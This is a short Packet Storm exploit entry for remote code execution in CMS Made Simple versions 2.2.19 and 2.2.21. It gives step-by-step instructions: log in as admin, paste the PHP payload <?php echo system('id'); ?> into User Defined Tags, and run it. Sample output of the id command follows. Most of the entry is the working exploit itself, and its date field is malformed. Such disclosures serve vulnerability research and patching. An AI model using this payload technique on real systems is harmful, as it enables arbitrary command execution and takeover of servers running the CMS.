CMS Made Simple versions 2.2.19 and 2.2.21 suffer from a remote code execution vulnerability.
1fba8dc39f6eab628cec63c1efe79d88f846728e2cc5c0253884d3ade1777638# Exploit Title: CMS Made Simple Version: 2.2.19/2.2.21 - Remote Code Execution
# Date: 2024-21-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cmsmadesimple.org/
# Version: 2.2.19/2.2.21
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple
1 ) log in as admin and go to Extensions > User Defined Tags >
2 ) Write in Code place payload > <?php echo system('id'); ?>
3 ) After click run you will be see result :
uid=1000(admin) gid=1000(admin) groups=1000(admin) uid=1000(admin) gid=1000(admin) groups=1000(admin)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed